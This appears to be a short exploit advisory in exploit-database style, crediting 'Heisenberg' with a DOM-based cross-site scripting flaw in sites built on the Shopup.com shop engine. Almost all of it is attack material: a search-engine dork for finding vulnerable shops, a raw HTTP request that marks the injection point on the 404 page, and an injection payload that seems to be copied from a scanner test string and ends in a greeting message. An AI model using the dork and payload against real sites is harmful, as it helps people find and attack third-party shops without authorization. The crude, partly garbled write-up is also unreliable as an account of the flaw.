Exploit title : 
Exploit author : Heisenberg
software link : http://www.shopup.com
version : *
dork : intext:"Engine by Shopup.com"
Tested on : Win7_64
GET /404.html[%Inject_Here%] HTTP/1.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*



>Source : window.location
>Location : http://target/404.html
>Exploit : target/404.html[%Inject_Here%]
>Use Payload/Injection : ?wvstest=javascript:domxssExecutionSink(1,"%27%5C"><xsstag><marquee><h>to my M7 and others F you are my stars it's great honor being with you wish you the best</h></marquee>)